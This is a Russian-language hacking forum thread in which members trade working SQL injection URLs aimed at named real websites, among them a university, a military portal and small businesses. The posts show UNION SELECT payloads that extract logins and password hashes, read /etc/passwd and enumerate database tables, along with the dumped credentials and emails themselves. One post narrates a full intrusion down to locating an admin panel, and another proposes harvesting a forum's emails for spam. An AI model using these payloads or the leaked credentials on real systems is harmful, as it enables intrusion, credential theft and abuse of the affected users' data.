SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.audiofoundation.org.nz/

    Все базы расковырял, где пароли лежат)

    Code:
    http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,login   ,pass,mail,name),3,4,5,6,7,8,9,10,11,12,13,14+from+audiofoundation_new.users+limit+1,1/*
    Code:
    http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,login   ,pass,mail),3,4,5,6,7,8,9,10,11,12,13,14+from+drupal.users+limit+1,1/*
    Code:
    http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai   l,password),3,4,5,6,7,8,9,10,11,12,13,14+from+audiofoundation.artistdb+limit+0,1/*
    Code:
    http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai   l,password,name),3,4,5,6,7,8,9,10,11,12,13,14+from+history_forum.LUM_User+limit+0,1/*
    Code:
    http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai   l,password,name),3,4,5,6,7,8,9,10,11,12,13,14+from+afhp_forum.LUM_User+limit+0,1/*
    Code:
    http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,mail,   password),3,4,5,6,7,8,9,10,11,12,13,14+from+loudblog.lb_authors+limit+0,1/*
     
    4 people like this.
  2. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    в любые подставить
    http://любой_из_этих_сайтов/admin.php
    везде пасс 1q2w3e4r5t
     
    2 people like this.
  3. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    www.cetim.ch

    HTML:
    http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    5.0.45-log:[email protected]:cetimch

    HTML:
    http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd'),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
     
    1 person likes this.
  4. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    search.icq.com
    Сама уязвимость :
    Результат за 5 минут:

    www.mosapteki.ru
    Alesta:5cda66bc6dcaa02a447c95c8fa4a1ec9
    ===
    www.vet.ru
    spacedefender:ab334feeb31c05124cb73fa12571c2f6:captain
    ===
    skazki-o-sile.ru
    admin:0a8a413d9bc599c8e1de5fda8aa6eb02
    ===
    www.npnh.ru
    npnh:a942f5f0961d0154b26e41db069cde6b
    ===
    www.usinsknet.ru
    admin:fe01d67a002dfa0f3ac084298142eccd:eek:range
    ===
    www.liveinstyle.ru
    admin:ae2b1fca515949e5d54fb22b8ed95575:testing
    ===
    www.7435588.ru
    Admin:246edc51f5bbea6acb7b456d4b4a6a7a:yupopa
    ===
    www.fut-bol.ru
    9389ff7e426048ed1ca3aa6b9b341a1d
    ===
    http://www.manhattan-receivers.com
    Administrator:8b1910f8606a57e795e0f39f8bcd0d24:ckaljotia
    ===
    http://www.ua-china.com
    admin:42bb650a9dfb3927c79ffaaae1e1abce:simfo
    ===
    http://www.nauticapress.com
    admin:9ae5bdc58f37d3b242a8c077a5d500f5:eek:rvalho
    ===

     
    1 person likes this.
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Это боян. Под xoops уже кто то сплойт писал, под именно такую багу:\
     
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вы что реально думаете что icq.com на мускуле работает? там сибэйз асе последней ветки
    и вобще там права mbread вобщем бесполезно, и нечего мучаться
     
    #4306 Scipio, 4 Jan 2008
    Last edited: 4 Jan 2008
    4 people like this.
  7. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    www.awdf.org

    HTML:
    http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    5.0.22:robin@localhost:dbawdf3

    HTML:
      http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+count(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+information_schema.tables/*
    В ответ я получил 1906, но проверив, таблиц оказалось меньше 100 =)

    HTML:
    http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+adminusers+LIMIT+0,1/*
    1:test:test:[email protected]
    2:vera:test:[email protected]

    (http://www.awdf.org/admin/index.php)

    HTML:
    http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+dbacademicafrica.aa_user+LIMIT+5,1/*
    11:admin:AA6tQYSfGxd/A

    HTML:
    http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(memberid,0x3a,email,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+dbacademicafrica.aa_member+LIMIT+650,1/*
    655:[email protected]:johnog
     
  8. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.72dpi.co.nz/

    Code:
    http://www.72dpi.co.nz/packages/index.php?pid=-1+union+select+1,convert(concat_ws(0x3a,us   er(),database(),version())+using+latin1),3,4/*
     
    2 people like this.
  9. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    http://policies.lakeheadu.ca

    HTML:
    http://policies.lakeheadu.ca/policy.php?pid=-178+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),user(),database()),19/*
    4.1.21-standard-log:admini@localhost:administration
     
  10. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    MsSQL injection:
    www.aiim.org - Google PR 7 :).
     
    3 people like this.
  11. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    http://webcast.streamx.com.au/?id=1'+or+1=(SELECT+db_name())--
     
    #4311 А®ТеS, 4 Jan 2008
    Last edited: 4 Jan 2008
  12. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.botellaalmar.com.ar/

    Code:
    http://www.botellaalmar.com.ar/detalle_nota.php?Id=10002&tipo=-1+union+select+concat_ws(0x3a,user(),version(),database())/*
     
    2 people like this.
  13. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    www.7courier.com

    4.1.22-standard:thetphyo_7courier:thetphyo_7c@localhost

    www.belledune.com

    5.0.18-nt :belledunedb: belleduneUSER@localhost

    www.visitrandolphcounty.com

    4.1.20: visitrandolph: visitran@localhost
     
    #4313 ThreeD, 5 Jan 2008
    Last edited: 5 Jan 2008
    2 people like this.
  14. scrat

    scrat кодер

    Joined:
    8 Apr 2007
    Messages:
    625
    Likes Received:
    541
    Reputations:
    3
    http://new.prikolnoe.tv
    чёто не оч. получается она у меня :mad:
     
    #4314 scrat, 5 Jan 2008
    Last edited: 5 Jan 2008
  15. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    предистория)) нужно было найти траф.. ну а траф у нас где?) правильно еротика и тд :D
    поиск мне помог

    нашли сайт

    http://svalka.biz/go.php?go=Download&id=17985/*
    http://svalka.biz/go.php?go=Download&id=17985+order+by+6/*

    6 полей

    http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6/*

    #5.0.22-log::glamur_svalka@localhost::glamur_svalka
    5-тая версия - тянем всю инфу

    http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6+fromusers/*


    http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME),3,4,5,6+from+information_schema.tables/*
    таблици /*жалко видно таблици только этого хоста*/

    glamur_svalka::admin
    glamur_svalka::comments
    glamur_svalka::downloads
    glamur_svalka::fail_logs
    glamur_svalka::iplogg
    glamur_svalka::linker
    glamur_svalka::main_logs
    glamur_svalka::que
    glamur_svalka::site_downloads
    glamur_svalka::succes_logs


    http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME,column_name),3,4,5,6+from+information_schema.columns/* ну и сами поля /*выбраны сами интересные таблы*/
    glamur_svalka::succes_logs::time
    glamur_svalka::succes_logs::date
    glamur_svalka::succes_logs::ref
    glamur_svalka::succes_logs::agent
    glamur_svalka::succes_logs::hostname
    glamur_svalka::succes_logs::ip
    glamur_svalka::succes_logs::password
    glamur_svalka::succes_logs::username
    glamur_svalka::succes_logs::id

    glamur_svalka::fail_logs::time
    glamur_svalka::fail_logs::date
    glamur_svalka::fail_logs::ref
    glamur_svalka::fail_logs::agent
    glamur_svalka::fail_logs::hostname
    glamur_svalka::fail_logs::ip
    glamur_svalka::fail_logs::password
    glamur_svalka::fail_logs::username
    glamur_svalka::fail_logs::id

    glamur_svalka::admin::id
    glamur_svalka::admin::username
    glamur_svalka::admin::password
    glamur_svalka::admin::email
    glamur_svalka::admin::level

    http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,id,username,password,email,level),3,4,5,6+from+glamur_svalka.admin/*
    достаем данные пользователей

    1::admin::admin::[email protected]::1

    мдям.. тяжелый пасс =\ теперь админка.. по стандартным местам ее нет.. смотрим в логах /*нестандартный ход)))*/

    http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,ip,username,password,ref,hostname),3,4,5,6+from+glamur_svalka.succes_logs/*
    и мне выдало адресс админки))

    http://svalka.biz/admin/admincp.php?action=login или подругому

    з.ы. в админке нет ничего особо интересного =\
    з.з.ы. шел не залил =\
     
    _________________________
    9 people like this.
  16. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    журнал ironman
    таблицы, где встречается колонки похожие на "pass"
    имеется таблица - account - это от форума. форум кончелыжный, через него замутить ничего нельзя.
    далее нашлась таблица curent_user - хер пойми что это. там одна запись всего - login:password
    есть админка:
    нихрена туда логины и пароли из форума и расшифрованные не катят (БЛ*ТЬ!!!)

    есть вебмайл:
    и phpmyadmin:
    добытые пароли, ествественно, никуда не подходят. доступ к таблице mysql.user - закрыт. что еще замутить я больше не знаю!

    P.S. из базы имэйлов на форуме можно сделать спам-базу для рассылки рекламы виагры. Думаю, отдача будем ошелмляющей :) (на форуме качки обсуждают стеройды)
     
    5 people like this.
  17. RaDDeaD

    RaDDeaD Elder - Старейшина

    Joined:
    28 Dec 2006
    Messages:
    44
    Likes Received:
    18
    Reputations:
    1
    http://www.centrgroup.ru/nn.php?id=-%201+union+select+1,2,3,4,5,concat(id,0x20,user_name,0x3a,user_pass),7+from+users+where+id=0/*

    Тока вот до админки не дорылся... :(
     
    #4317 RaDDeaD, 5 Jan 2008
    Last edited: 5 Jan 2008
    1 person likes this.
  18. RaDDeaD

    RaDDeaD Elder - Старейшина

    Joined:
    28 Dec 2006
    Messages:
    44
    Likes Received:
    18
    Reputations:
    1
    http://www.tni.mil.id/patriotweb/?action=PesanSaran&ed=-1+union+select+0,1,concat(username,0x3a,password,0x3a,email)+from+user/*
    :D
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    www.ipz.ru

    http://www.ipz.ru/alltop.php?cat=-1+union+select+version()/*
    Версия: 5.0.41-community

    http://www.ipz.ru/alltop.php?cat=-1+union+select+concat(login,char(58),password,char(58),email)+from+users+limit+0,1/*

    Там 1499 юзеров....Можно через Limit
     
    1 person likes this.
  20. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    вот поклоникам линейки:
     
    2 people like this.
Thread Status:
Not open for further replies.